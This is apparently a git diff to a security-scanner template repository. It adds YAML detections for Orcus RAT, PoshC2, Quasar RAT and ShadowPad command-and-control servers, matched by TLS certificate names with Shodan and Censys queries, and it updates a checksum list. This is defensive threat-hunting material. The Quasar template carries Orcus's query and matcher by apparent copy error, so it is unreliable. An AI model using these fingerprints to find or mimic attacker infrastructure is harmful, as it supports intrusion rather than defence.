a/http/exposed-panels/c2/metasploit-c2.yaml +++ b/ssl/c2/metasploit-c2.yaml @@ -10,7 +10,7 @@ info: https://www.socinvestigation.com/shodan-filters-to-hunt-adversaries-infrastructure-and-c2/ metadata: max-request: 1 - verified: true + verified: "true" shodan-query: ssl:"MetasploitSelfSignedCA" tags: c2,ir,osint,metasploit,panel diff --git a/ssl/c2/orcus-rat-c2.yaml b/ssl/c2/orcus-rat-c2.yaml new file mode 100644 index 0000000000..91d7dd3ec5 --- /dev/null +++ b/ssl/c2/orcus-rat-c2.yaml @@ -0,0 +1,31 @@ +id: orcus-rat-c2 + +info: + name: OrcusRAT - Detect + author: pussycat0x + severity: info + description: | + Orcus RAT is a type of malicious software program that enables remote access and control of computers and networks. It is a type of Remote Access Trojan (RAT) that has been used by attackers to gain access to and control computers and networks. + reference: | + https://github.com/thehappydinoa/awesome-censys-queries#orcusrat-- + metadata: + censys-query: 'services.tls.certificates.leaf_data.subject.common_name: {"Orcus Server", "OrcusServerCertificate"}' + max-request: 1 + verified: "true" + tags: c2,ir,osint,orcus,ssl + +ssl: + - address: "{{Host}}:{{Port}}" + + matchers: + - type: word + part: issuer_cn + words: + - "Orcus Server" + - "OrcusServerCertificate" + condition: or + + extractors: + - type: json + json: + - ".issuer_cn" diff --git a/ssl/c2/posh-c2.yaml b/ssl/c2/posh-c2.yaml new file mode 100644 index 0000000000..c0affa7f17 --- /dev/null +++ b/ssl/c2/posh-c2.yaml @@ -0,0 +1,30 @@ +id: posh-c2 + +info: + name: Posh C2 - Detect + author: pussycat0x + severity: info + description: | + PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming, post-exploitation and lateral movement. + reference: | + - https://twitter.com/MichalKoczwara/status/1551639708949692416 + - https://poshc2.readthedocs.io/en/latest/ + metadata: + max-request: 1 + shodan-query: ssl:"P18055077" + verified: "true" + tags: c2,ir,osint,posh,ssl + +ssl: + - address: "{{Host}}:{{Port}}" + + matchers: + - type: word + part: issuer_cn + words: + - "P18055077" + + extractors: + - type: json + json: + - ".issuer_cn" diff --git a/ssl/c2/quasar-rat-c2.yaml b/ssl/c2/quasar-rat-c2.yaml new file mode 100644 index 0000000000..2bfbb82a05 --- /dev/null +++ b/ssl/c2/quasar-rat-c2.yaml @@ -0,0 +1,32 @@ +id: quasar-rat-c2 + +info: + name: Quasar RAT C2 SSL Certificate - Detect + author: johnk3r,pussycat0x + severity: info + description: | + Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult. + reference: | + https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat + metadata: + max-request: 1 + verified: "true" + shodan-query: ssl.cert.subject.cn:"Quasar Server CA" + censys-query: 'services.tls.certificates.leaf_data.subject.common_name: {"Orcus Server","OrcusServerCertificate"}' + tags: c2,ir,osint,malware,quasar,rat + +ssl: + - address: "{{Host}}:{{Port}}" + + matchers: + - type: word + part: issuer_cn + words: + - "Quasar Server CA" + - "OrcusServerCertificate" + condition: or + + extractors: + - type: json + json: + - " .issuer_cn" diff --git a/ssl/c2/shadowpad-c2.yaml b/ssl/c2/shadowpad-c2.yaml new file mode 100644 index 0000000000..d148047ef6 --- /dev/null +++ b/ssl/c2/shadowpad-c2.yaml @@ -0,0 +1,27 @@ +id: shadowpad-c2 + +info: + name: ShadowPad C2 Infrastructure - Detect + author: pussycat0x + severity: info + description: | + ShadowPad constitutes various plugins having specific functionality and the malware has the capability to “plug” or “unplug” these plugins at run-time in shellcode format. It can also load additional plugins dynamically from the C2 server when required. + metadata: + censys-query: services.tls.certificates.leaf_data.subject_dn="C=CN, ST=myprovince, L=mycity, O=myorganization, OU=mygroup, CN=myServer" + max-request: 1 + verified: "true" + tags: c2,ir,osint,malware + +ssl: + - address: "{{Host}}:{{Port}}" + + matchers: + - type: word + part: subject_dn + words: + - "CN=myServer, OU=mygroup, O=myorganization, L=mycity, ST=myprovince, C=CN" + + extractors: + - type: json + json: + - ".subject_dn" diff --git a/ssl/weak-cipher-suites.yaml b/ssl/weak-cipher-suites.yaml index fee702ea14..3f7ceee1c3 100644 --- a/ssl/weak-cipher-suites.yaml +++ b/ssl/weak-cipher-suites.yaml @@ -26,6 +26,7 @@ ssl: matchers: - type: word + name: tls-1.0 part: cipher words: - "TLS_DHE_PSK_WITH_CAMELLIA_128_CBC_SHA256" @@ -237,6 +238,7 @@ ssl: matchers: - type: word + name: tls-1.1 part: cipher words: - "TLS_DHE_PSK_WITH_CAMELLIA_128_CBC_SHA256" @@ -448,6 +450,7 @@ ssl: matchers: - type: word + name: tls-1.2 part: cipher words: - "TLS_DHE_PSK_WITH_CAMELLIA_128_CBC_SHA256" @@ -659,6 +662,7 @@ ssl: matchers: - type: word + name: tls-1.3 part: cipher words: - "TLS_DHE_PSK_WITH_CAMELLIA_128_CBC_SHA256" diff --git a/templates-checksum.txt b/templates-checksum.txt index 2e68b48ea6..9d74ab38d5 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -1,19 +1,19 @@ CODE_OF_CONDUCT.md:5c581b341cecd31ea4a275098ec84be9951f1593 -CONTRIBUTING.md:b3dbbd3a35dd55d57ddbe460e18407806afeeab0 +CONTRIBUTING.md:a280fa8badd8622a481e1bb7f492dd82ac05ea71 LICENSE.md:48790f08ca6757688e2f5f3f4b017a073b3e20df PULL_REQUEST_TEMPLATE.md:c8aba78d67442f639483a10fa74681dea94faeb7 -README.md:70a4e2ce1b92217229706c5c35e5ee7170ccda18 +README.md:5d758a72e5dfca78e2b8bca52a2857dd08de1fbf README_KR.md:174470dbc5c69e81f83ff816655a52cc8c5d7f26 -TEMPLATES-STATS.json:860986fad6257482b7828f258bc7c516e28ecaa1 -TEMPLATES-STATS.md:4eb510d3f0a72540d2ec172240eb5cad5a92e0da -TOP-10.md:1e53214f047f7f17e8f2265398586ee01e00b009 -contributors.json:ff4ddb7612fdb9f10ce078a3aa796c1e07c8dcf4 -cves.json:507f89c0cb0b2791d7bc45e466cec061ea54ad99 -cves.json-checksum.txt:5b3a9219d6581a1cee7266f20b7f4639e417b291 +TEMPLATES-STATS.json:76d960cb9efb4a76eb9a7319a18434de2b9224f9 +TEMPLATES-STATS.md:ff843bb4bf7feb5abe452334bc7fa76d66da0ed5 +TOP-10.md:98a95dca7b8b2a1992b076ae8cd121513e09e330 +contributors.json:db5c97304376896f78f0752cca0e621d7c97b235 +cves.json:6f6522c4f81a83ea6d81232a8f0431ae89debd56 +cves.json-checksum.txt:de8647fd559b188eefb327d735e6248559639a97 dns/azure-takeover-detection.yaml:90ea816357526ee7c170731114de8fc0a2357a27 -dns/caa-fingerprint.yaml:3fe25f081d6cee442309ba267cf611b66d4539d7 -dns/cname-fingerprint.yaml:be8abd622fe067529fcd70bfe41002ab55f60cd6 -dns/cname-service.yaml:9943420cec654db4a13c343a796bf8c11e5ad3c3 +dns/caa-fingerprint.yaml:7dcc71c91d6cb3d8e290e09b52768b6017fbb161 +dns/cname-fingerprint.yaml:f7200ff1f3b3f96a7a92ddd6b49e5e5abe1d2377 +dns/cname-service.yaml:8b4716105619fadac741b19c60c682cf0576e927 dns/detect-dangling-cname.yaml:1a886981ae636afd1f8e3e475123efba0b456053 dns/dmarc-detect.yaml:bf8de471bc23a5239d8be1e85eae48d66ce2bffd dns/dns-waf-detect.yaml:ce4f83bd478e2358c44fcd0ccc9562970f5d7421 @@ -33,7 +33,7 @@ file/android/biometric-detect.yaml:390458adc0d25cf76f0f1d533d5c58af9dbd1bc5 file/android/certificate-validation.yaml:607d9ba229e7868e97a0172c37209b8b234b6625 file/android/content-scheme.yaml:5d14d3691d2b997beb22d15a10fd7d14ce3d6999 file/android/debug-enabled.yaml:209dd2b56610e582ce72054f105715064ff78bad -file/android/deep-link-detect.yaml:b89cef98bb3a5501197b0dba677b06899cb783c4 +file/android/deep-link-detect.yaml:2e1d0f6e96354202a3a4b0e680c8f08a25a20e73 file/android/dynamic-broadcast-receiver.yaml:0c138e576e003fd3a9980192920efc9baff35bbe file/android/file-scheme.yaml:7ec4757b1673378738863a8552c490418ed69cb0 file/android/provider-path.yaml:900bd65305c4987c88146a5d2d5f00766727e06e @@ -66,79 +66,79 @@ file/audit/pfsense/set-hostname.yaml:cf6cb7d196858205bbe4a01ab3169e542c4420cf file/bash/bash-scanner.yaml:34c81ff693760add86b161184ca4ef55535d4ba6 file/electron/electron-version-detect.yaml:8021ce0b863fc7090d0b13a29b97bf8ef1a208b0 file/electron/node-integration-enabled.yaml:3de6b8cc228cb5cb4d806317982aeebb49d0c4b7 -file/js/js-analyse.yaml:c2da42d2857558e8043b9d58abc062e3aeb122d6 -file/keys/adobe-secret.yaml:f757c89cf4b6a3508e1537a23bfd83314839122b -file/keys/age/age-identity-secret-key.yaml:ea4e90c1e3eb2c4d533f8e1ed36f188ebf30e7a3 -file/keys/age/age-recipient-public-key.yaml:09da1b5dae3b27a8d887dc8175c50ebaf2b31204 -file/keys/amazon/amazon-account-id.yaml:022fe69bd240cba2810d02d19f17e1c03a2ed55d +file/js/js-analyse.yaml:a6147fffd63f593695966ef2bc8c188ecc2be9e8 +file/keys/adobe-secret.yaml:356ca5c276c138bdf283fb5ad37c92c334039f9e +file/keys/age/age-identity-secret-key.yaml:dfd8a55c73a302cc09e4fd808b0f9e8d95e7a780 +file/keys/age/age-recipient-public-key.yaml:a6fe20a97710ae2ee48df1d3607b0b3e2f4c55fa +file/keys/amazon/amazon-account-id.yaml:26ed07b8a94a2c9e96f9e27027c990242f89c6cc file/keys/amazon/amazon-mws-auth-token.yaml:714c2eafbc61cdae9d451bcb37cb9e04c927770c -file/keys/amazon/amazon-session-token.yaml:db67c2526c47f9bb8a949f3d9f0a98d92a37bd5f +file/keys/amazon/amazon-session-token.yaml:8e9ea9d135ce1646b012d8773e44928510ca5890 file/keys/amazon/amazon-sns-token.yaml:34135d8c2e049f4c6441c339e9444711f0997c36 file/keys/amazon/aws-access-id.yaml:2e1022a735febe80d44b71837a35a4afad0ca525 file/keys/amazon/aws-cognito.yaml:7ef8a95dec1248da6ed314cf33dac219f477e45f -file/keys/azure/azure-connection-string.yaml:2af2a5ae3c0e75a0f97c9aaef56021bbe00222ac +file/keys/azure/azure-connection-string.yaml:d58bf3c6083043544a3274141e58741eab46bc5f file/keys/branch-key.yaml:5378baf1bc66078a1cd36aab840424a14495e149 file/keys/cloudinary.yaml:f04384e4f360895e73718aae4c580f65b5ebdc32 -file/keys/code-climate-token.yaml:964f8d91f5600565d18bc0e4bab407b6c7544149 -file/keys/cratesio-api-key.yaml:928d587e35122954b479519890f6416036e1dc0b +file/keys/code-climate-token.yaml:d63800f776299ae4b0b7c9f2a351d6587ec41c8f +file/keys/cratesio-api-key.yaml:23affad7d7e1de4393e4ac401e8b9bf41fabda1d file/keys/credential-exposure.yaml:d3aab2906aac88559f73e30cbce82493c431c419 file/keys/credentials.yaml:11f3d4e8623b2dcdeb565bac29ffb113a14b8014 -file/keys/digitalocean/digitalocean-access-token.yaml:5d45392aac1c3d59a9cd30ea5880b2d09c1d8dd4 -file/keys/digitalocean/digitalocean-personal-access.yaml:683b5f4096e1bbc5b9a0da12bda1bd32bd0f5cd5 -file/keys/digitalocean/digitalocean-refresh-token.yaml:deefe2a8ad6a29b284c70e4505a1021e09ff047e +file/keys/digitalocean/digitalocean-access-token.yaml:43ffca49436dfe11020aee5be7273d42642d0cab +file/keys/digitalocean/digitalocean-personal-access.yaml:eacf85f4fd4de677f7a5b58a8ffd107213ae24f8 +file/keys/digitalocean/digitalocean-refresh-token.yaml:2a12af9a7ecdb9dbde896582055c4d11b5a6fc50 file/keys/dynatrace-token.yaml:3052a2375f053a715f8280c30507f70438a66ecd file/keys/facebook/facebook-client-id.yaml:4020b932d3166489f448a0ad3babcf6f38843339 file/keys/facebook/facebook-secret.yaml:4920a003ff197e1cc1a409c5c5faf5127fa603d1 -file/keys/facebook/fb-access-token.yaml:f5ea7dfc6d22647c4ddfcd53f8e1a9787a27d87c +file/keys/facebook/fb-access-token.yaml:4680bd7c7b97d2d6c80684c9443168ae683faf6a file/keys/fcm-api-key.yaml:28c9b101822b4d0d9709482c661fca6993714f02 -file/keys/figma-access-token.yaml:0a9e15f8e64653f84c07794550e1cd4938b37fb1 +file/keys/figma-access-token.yaml:bf271c0a3f4cdd5a04ea90b444337fa74598f129 file/keys/firebase-database.yaml:d187e6fb3365bc68dad4e64871825154805361ba file/keys/gcp-service-account.yaml:ccf3568c6744fccf2371ac8bfd555526bfb13e20 file/keys/github/github-app-token.yaml:8e51a916ea7c8007c1789ea45c7950d5a8b56a48 file/keys/github/github-oauth-token.yaml:2610a79ccc3bf1ca982f2a673b9fdb00a2742f8f -file/keys/github/github-outdated-key.yaml:4064141c57603d36c6f9bf2ac137852a5c51562a +file/keys/github/github-outdated-key.yaml:4d24664f6b4cc04e91b27318a02de9d40b9df40c file/keys/github/github-personal-token.yaml:e08c2e89e4dc6ca17ea3cc0459a7e37f55542f9f file/keys/github/github-refresh-token.yaml:fbf1308c1272f4e29830e7dde624c4ed0bdfd6fd -file/keys/gitlab/gitlab-personal-accesstoken.yaml:778e3960e0c6a740356e0d7d9b85da6d4b1a0f7a -file/keys/gitlab/gitlab-pipeline-triggertoken.yaml:85abcc705e0d222360b4f51fa224057a37c78319 -file/keys/gitlab/gitlab-runner-regtoken.yaml:bd9c23348b8c5bf9f7b33021c27208eb32df9654 +file/keys/gitlab/gitlab-personal-accesstoken.yaml:b350c6e4513d5255f425c0aaa01fe92dbd637c94 +file/keys/gitlab/gitlab-pipeline-triggertoken.yaml:41dc4692a7711c23f07e5a98f34b70ec06f72b45 +file/keys/gitlab/gitlab-runner-regtoken.yaml:88d73eea7ae5db026dd1458f2caadcf8bb92cd94 file/keys/google/google-api.yaml:b1a45d973f28663b184704ccc5a08b38ae6f4625 -file/keys/google/google-clientid.yaml:7e35ff35801de1be7fdd4753729f41082cf1ab63 -file/keys/google/google-oauth-clientsecret.yaml:7ab75310471959814fcc97c06b95ac4ad69738c9 -file/keys/heroku-key.yaml:6aee57ba597ecdf5623711158a5c69d23764949f -file/keys/jenkins-token.yaml:d9093a9446c989f8e294d23e7e2f0cb2204e4e79 +file/keys/google/google-clientid.yaml:602e1434d51d60bbfa05d440f7d27e41ecf9494c +file/keys/google/google-oauth-clientsecret.yaml:1dfa3a5958773f38c4ce9aca875752e581ae7833 +file/keys/heroku-key.yaml:eddcdd450e5e55e1eda210dd79a040ba760fb794 +file/keys/jenkins-token.yaml:09a317132b0fa3cca157a5fd0481f6f5fdfe55a9 file/keys/linkedin-id.yaml:0b948ed87d6f77f610bc34157621824b7f783cf8 file/keys/mailchimp-api.yaml:23710637c6f9e73a10eb0fe84f7ebe1b2bc36c94 file/keys/mailgun-api.yaml:7e7c2baf26d65958dd3cd59bee9569f4f89e36b3 -file/keys/mapbox-token.yaml:b498f5b26e3ee026c1418baea97604c1dbde6177 -file/keys/newrelic/newrelic-pixie-apikey.yaml:4632c995f2edd715a70c7cfb4a9b5ac1614ed9d2 -file/keys/newrelic/newrelic-pixie-deploykey.yaml:481895ea49510ae6e7fefb4dc9d6fc6ba0d7010a -file/keys/npm-accesstoken.yaml:82661f1268d3c4f10a84d54399d176fc347fef68 -file/keys/nuget-key.yaml:281e1cbe3105bccad89d79849406a4b96be58a42 -file/keys/openai-key.yaml:0e9738a193c562efab848e4411c436a408a9c5e9 +file/keys/mapbox-token.yaml:8ea3826a27093d769c442dcd16e3eb18358a3fd3 +file/keys/newrelic/newrelic-pixie-apikey.yaml:aeee8da09447dc9b03611b9212fe65125a14f3be +file/keys/newrelic/newrelic-pixie-deploykey.yaml:bb309bd9ab60e88d2edc206c8e63450c6f68de50 +file/keys/npm-accesstoken.yaml:4a5ea76aa7e2ad584f91b6192b7bb4bc574bd826 +file/keys/nuget-key.yaml:6c136e19e8ee5fc14f3e069794e97c8ec9ba3a97 +file/keys/openai-key.yaml:4d31dd5f7417926f88cc7fdd47c625a2d39f7976 file/keys/paypal-braintree-token.yaml:a08c502c502936044187c9a9d6d9c2aec9b9d60c file/keys/pictatic-api-key.yaml:281d6ef792d8f776a9b4cb96f5b77ab13cad6f90 -file/keys/postman-api-key.yaml:d327ca3394766971c52e14e3e0d1a6f6c73e0e0b +file/keys/postman-api-key.yaml:ce689c9a7fc037bba5c6e221b539ffdbd33e5541 file/keys/private-key.yaml:c7d709816fee0382c0250b2da2bb99ce6588c836 -file/keys/pypi-token.yaml:8f13a6fc673007a93feffb6429e1878e79e1051c +file/keys/pypi-token.yaml:1847da81386d9c357f39f224cfc8399bceb49c6d file/keys/razorpay-client-id.yaml:846158bf5563bd69f4f804f56409622b738a8a92 -file/keys/rubygems-key.yaml:26973f95d024effbe24083826cd8792288bb4562 +file/keys/rubygems-key.yaml:1d2e16f43542022c87efdce045a3b6e24bf7cc16 file/keys/s3-bucket.yaml:9d725525020d19b183553ee8f097e54ef4e082cd -file/keys/sauce-access-token.yaml:f471b43f4fb0ae469eba700a42a62cad5f510a4b -file/keys/segment-public-api.yaml:d400f879afdee6596ef8519ded9504ea9e7799ed +file/keys/sauce-access-token.yaml:e99e5fc3d83096a21145693cb89d28ca6615fb80 +file/keys/segment-public-api.yaml:7124548a3a95be142bc62904137f0d5f0345cf7b file/keys/sendgrid-api.yaml:0dfbd1ae46def32a64b82e5273c73990a9e20401 file/keys/shopify-custom-token.yaml:ab332a7a67468bf0784bb12cc21a7ede6025736c file/keys/shopify-private-token.yaml:700ea59fd3f7a5f955757e6d5cebe22a05847091 -file/keys/shopify-public-access.yaml:3758644e781700c7a1c70acadf44aadb3ecbade8 +file/keys/shopify-public-access.yaml:7587022f7fbb2cadda502b74e4a8014cd046d8d2 file/keys/shopify-shared-secret.yaml:b5e51fb3e30450347ef8db2087363d6276e12e76 file/keys/shopify-token.yaml:7d7faf45836a7e6288fbe623d1c3455730d95acf file/keys/slack-api.yaml:cbcf3b1cc032051c69bdffbc983bc0af754ebd2d file/keys/slack-webhook.yaml:a523fa27b1ecf24122c571c5a3c9327dc2ab30e8 file/keys/square-access-token.yaml:b46a9e939c03f7a4a2254ca28e35233d33fab68a file/keys/square-oauth-secret.yaml:90f91689ab5ce90259d6e84a748648ae5cb4b5f9 -file/keys/stackhawk-api-key.yaml:918a94073e9fd09f179b7e18c810e3c2ed352543 +file/keys/stackhawk-api-key.yaml:a760b36d2ee78ffcb938598c7a1beaf543de2bd5 file/keys/stripe-api-key.yaml:a8849a29190fd1fb92a50e9e0a6c49ea694043a9 -file/keys/telegram-token.yaml:4a4493f2ce35b9a84d725aeef016011e3e4d06c5 +file/keys/telegram-token.yaml:63257d788cadbfd4e2ea55b974b2d9433441093b file/keys/twilio-api.yaml:5ea16764819395bcfe307964c1b32a4dea86bb13 file/keys/twitter-secret.yaml:fa82d681ae94b741b25786f58835c9be605d8592 file/keys/zapier-webhook.yaml:48526eeb6c83d543a5bd7a9e160231dbb3112474 @@ -147,6 +147,13 @@ file/logs/python-app-sql-exceptions.yaml:f9bc92aea698954c325c8073098c7abc7854906 file/logs/ruby-on-rails-framework-exceptions.yaml:4cacd8d7144f8353b5927cac2d008c1d08bb3a50 file/logs/spring-framework-exceptions.yaml:59912aa3db6ff6d29783c9b4fd84a6dc4d8369f3 file/logs/suspicious-sql-error-messages.yaml:86d8b6802e5a2db1bee5759e412c63d99fc42a94 +file/nodejs/admzip-path-overwrite.yaml:3f7f79845877828f87e72b81326e6a90049bd8ea +file/nodejs/express-lfr.yaml:66e40adffde0aa8793114e5796858df847b7226e +file/nodejs/generic-path-traversal.yaml:6288cb91267cbf40a39c16b88db5c9958fcd8926 +file/nodejs/tar-path-overwrite.yaml:64a2f5630d289007f9e14f7913e7a9e4d1b7f2a9 +file/nodejs/xss-disable-mustache-escape.YAML:41cfa7374491275b7b6b7679f35aa27be5d0e6a3 +file/nodejs/xss-serialize-javascript.yaml:6bc41b15fa7c495e0a90c588fdbb57e36ff2c902 +file/nodejs/zip-path-overwrite.yaml:5957c54cf4b8885a0c1d5d3a0bb25357ac6f07f1 file/perl/perl-scanner.yaml:ca5cfa3bae68e00b77dc73989a6331995be0b54a file/php/php-scanner.yaml:bc0232813f7fcf4ea23d20cb004ee2f992cc6745 file/python/python-scanner.yaml:3774742345a3c2db504ab69a5a4f2e2584bb5ed3 @@ -174,211 +181,213 @@ helpers/wordlists/wordpress-plugins.txt:916cc826b793c7afad2208b2fd46ea2cb752dec5 helpers/wordlists/wordpress-themes.txt:3424134fa69db08604545ecf1441cf6330bf0982 helpers/wordlists/wp-passwords.txt:dd36d46539d71aa9d1ecbdc83c7b74b931986d56 helpers/wordlists/wp-users.txt:b07f7f79b1d6ed1832e37e1d3feea3fd2bfb764b -helpers/wordpress/plugins/ad-inserter.txt:08105b9ddd906ead00c6c2b76a45ffa54f0efc2d +helpers/wordpress/plugins/ad-inserter.txt:8164ff8c18e4a71c5053ef56ac5652fc54372f2b helpers/wordpress/plugins/add-to-any.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/admin-menu-editor.txt:14b46e8ec03c3008e57ed966a26b63495b68b9b7 helpers/wordpress/plugins/adminimize.txt:f6eef27f4f1b21ffb32d92f3a8eee2e89d01c7df -helpers/wordpress/plugins/advanced-custom-fields.txt:0f436509ab5bd52c0ae2b582dad27602dc8c71e1 -helpers/wordpress/plugins/akismet.txt:6746a82081d852d58b152584407d5b80d3ac43f3 +helpers/wordpress/plugins/advanced-custom-fields.txt:ffc1feb775249e46c0a2c4c8c83174ca4d2a125e +helpers/wordpress/plugins/akismet.txt:4380b93c5f9e9e252ac9ac548449d65f955603c4 helpers/wordpress/plugins/all-404-redirect-to-homepage.txt:3a20090f6629e82dc86182a58926523409ffdf49 -helpers/wordpress/plugins/all-in-one-seo-pack.txt:c2dd4309068e440533d1b8b76fb6680a1324df74 -helpers/wordpress/plugins/all-in-one-wp-migration.txt:79e1c1c9108cfa9e61bea3ef6226c99f095888fb +helpers/wordpress/plugins/all-in-one-seo-pack.txt:a35a10fae0f653f425d1e5ae6ebf257254ab4b92 +helpers/wordpress/plugins/all-in-one-wp-migration.txt:9c43220fa09b15d375ba7679041d0bd2e22746b8 helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt:9fe4681fdf4528a009bfe5a862fb05457cc811cb helpers/wordpress/plugins/amp.txt:51ddbf27bf181d542a23643649c61739795a6771 helpers/wordpress/plugins/antispam-bee.txt:b91ff026739750b181b34969295fb93cf8fdc898 -helpers/wordpress/plugins/astra-sites.txt:157d4751f6fc258dd2244da6c46a957ae64e4258 +helpers/wordpress/plugins/astra-sites.txt:06752d2fb7fe65f618f40a9a33ebe4cc8e204317 helpers/wordpress/plugins/astra-widgets.txt:386ef6797a9c4de50f240b16bd76bbeae35a5711 -helpers/wordpress/plugins/autoptimize.txt:e533a0ddf49ac25eb565f7786d75249e411bd53a +helpers/wordpress/plugins/autoptimize.txt:661ae89c9a4b16c450c2a094d410c4ee74719cb3 helpers/wordpress/plugins/backwpup.txt:063ee00ca80d81e068dd404b59ceb2a03b2e7109 helpers/wordpress/plugins/better-search-replace.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/better-wp-security.txt:c9d80c377a036d155be198abbb91a3fb1d887536 helpers/wordpress/plugins/black-studio-tinymce-widget.txt:b74c052eec677c340bd7f99d94e1557d1f1d5e53 helpers/wordpress/plugins/breadcrumb-navxt.txt:3eebc7c9c53af6e2c8a91094b656f824a4b7150b -helpers/wordpress/plugins/broken-link-checker.txt:d1325bb186bd83303245e504f7c6eceae7f19e44 +helpers/wordpress/plugins/breeze.txt:a786e7e6a12cb225b5069f80d45bde42746d5be4 +helpers/wordpress/plugins/broken-link-checker.txt:595d550379b2cb8bccb9659627308ff4e751d23f helpers/wordpress/plugins/child-theme-configurator.txt:8e805063c85859847271163a1c51e5865e460aea helpers/wordpress/plugins/classic-editor.txt:933c3d96b7fbc319e2e08dda5c340797d7c8d99f helpers/wordpress/plugins/classic-widgets.txt:98250286db92ccc336dc6f622c10c8bc09286693 -helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt:0059a3a08cb083fb14dffcd2d524cbd08ab9030c +helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt:2f42d9eff165ff903900a0f16da2e2d14bf3c5d9 helpers/wordpress/plugins/cloudflare.txt:90e21e6589c03430b25fc4c525c14a0d6aff8619 helpers/wordpress/plugins/cmb2.txt:12291cb9150686dd1175c2a1662b9d1acd8b9b62 -helpers/wordpress/plugins/coblocks.txt:02aeb4dd00e9c0bb1104a19a9856dc679709da62 -helpers/wordpress/plugins/code-snippets.txt:1ee09476b338ca8261ad83be6aefa18693436588 +helpers/wordpress/plugins/coblocks.txt:513cc2cbdbaafc4b88110a8732fa6d6886d54ff5 +helpers/wordpress/plugins/code-snippets.txt:42aae5955584904bc2d13eabc3cf07107b276398 helpers/wordpress/plugins/coming-soon.txt:08d2e98e6754af941484848930ccbaddfefe13d6 -helpers/wordpress/plugins/complianz-gdpr.txt:bc60ded1a361444219b80ef3873685df214aa999 +helpers/wordpress/plugins/complianz-gdpr.txt:e34cf029ebf2ac799f0bb13727fc79e76b2e5ecb helpers/wordpress/plugins/contact-form-7-honeypot.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/contact-form-7.txt:aa016b2fe9e1d5ec44a206b16f237f748a306395 helpers/wordpress/plugins/contact-form-cfdb7.txt:0d092b3544a1eeaa4d69abaaa6d6e4f15660efbe -helpers/wordpress/plugins/cookie-law-info.txt:965faa18d7f005f5f4e18f490ea016d1f32a71f0 -helpers/wordpress/plugins/cookie-notice.txt:c279474699464ed180163c2aea058a299e5f64b1 +helpers/wordpress/plugins/cookie-law-info.txt:8b06ddb10d32fd00c6f396f4696592af976b2118 +helpers/wordpress/plugins/cookie-notice.txt:8599c5904510bf3031da09a62f0802bc300e964e helpers/wordpress/plugins/creame-whatsapp-me.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/creative-mail-by-constant-contact.txt:5c09cf3589e93781df4d59ed6b5a5d6207e2929c -helpers/wordpress/plugins/custom-css-js.txt:936ca97559c074553488fe2826eef28b0365ffdb -helpers/wordpress/plugins/custom-fonts.txt:642101d3d0ff174947ceace64ebb1e9d4700bca9 +helpers/wordpress/plugins/custom-css-js.txt:40c77b21aca06ae8ad4f43edd798f21a5571e995 +helpers/wordpress/plugins/custom-fonts.txt:9ff4120c2315a5db674958e00529bc95c08b0e76 helpers/wordpress/plugins/custom-post-type-ui.txt:98f8ee0eb7f9c0946fc02d5aafdb333ea0c45513 -helpers/wordpress/plugins/disable-comments.txt:fa6116a20acca977bccc47667ef17cf797887209 +helpers/wordpress/plugins/disable-comments.txt:8f52888ff7e35fd5ca310231fa076be1206b49bd helpers/wordpress/plugins/disable-gutenberg.txt:01fa77eedfbdd7455e8cf0cf239a4deb3041acfd helpers/wordpress/plugins/duplicate-page.txt:69a192666c004f35303d55baa6cc828eb977144f helpers/wordpress/plugins/duplicate-post.txt:59a7597c10f2e831aaf8a6526fb9a13e25ea680e -helpers/wordpress/plugins/duplicator.txt:caede917a8676edcac7e9d6481043710792411c9 +helpers/wordpress/plugins/duplicator.txt:6fd4fddb5287b4b436c24d78bff003d1ac10200d helpers/wordpress/plugins/duracelltomi-google-tag-manager.txt:dd48223123cc0aa36ed7f2190e593ca1ace58e24 helpers/wordpress/plugins/easy-fancybox.txt:fa2d8a9d18d35e9aa274b6d7d0ad0225d0362ed6 helpers/wordpress/plugins/easy-google-fonts.txt:775bbc46d0bc85e121db86ae12b2993ffedbb0ae helpers/wordpress/plugins/easy-table-of-contents.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/easy-wp-smtp.txt:d1325bb186bd83303245e504f7c6eceae7f19e44 -helpers/wordpress/plugins/elementor.txt:9583c1c66ce6e0b1ef3896e1791df755769272b2 +helpers/wordpress/plugins/elementor.txt:aa47e8401f52058e8878f672b20bb4bbd6d570b6 helpers/wordpress/plugins/elementskit-lite.txt:fd7189809f10f8d048cceae8bfbc391d319526a9 helpers/wordpress/plugins/enable-media-replace.txt:36442478f1f952d62cb89e1b634d5937a7d2863f helpers/wordpress/plugins/envato-elements.txt:fefed34c88a4926b37d965db8c15fed2727796a6 -helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt:57efd6c9af996d49184c10d2eb37abea3ad4614c -helpers/wordpress/plugins/ewww-image-optimizer.txt:42ec0805ce498efecaae5f4c79df7d2b5ad63eea -helpers/wordpress/plugins/facebook-for-woocommerce.txt:9f9e8dec21a5d7ea049d26cb0901b0eeeb579943 +helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt:e3b1c874b07e920f5092b34238b539c29b1e3578 +helpers/wordpress/plugins/ewww-image-optimizer.txt:47c3ed69e5609d2452fff4d1fa775f2f0aaa7d4c +helpers/wordpress/plugins/facebook-for-woocommerce.txt:7426d695a30092738382fce59a78dd77be5bfc39 +helpers/wordpress/plugins/fast-indexing-api.txt:7fc90060ab7493dc709f0e0cbc6ae3ca7204a614 helpers/wordpress/plugins/favicon-by-realfavicongenerator.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/flamingo.txt:98a16af997b52cb888232ab5d79a527b0716561c -helpers/wordpress/plugins/fluentform.txt:e881296a73d9b5b8b2320adc83e958594c7cfc29 +helpers/wordpress/plugins/fluentform.txt:a832235a17d232a9abf36075ae469dee7e69ff3d helpers/wordpress/plugins/font-awesome.txt:f4bf33bfd9c3793655f2a19fca0ee1ca41e62e6e helpers/wordpress/plugins/force-regenerate-thumbnails.txt:32fecb37588747cdb8227230edc41ff2ca6557e1 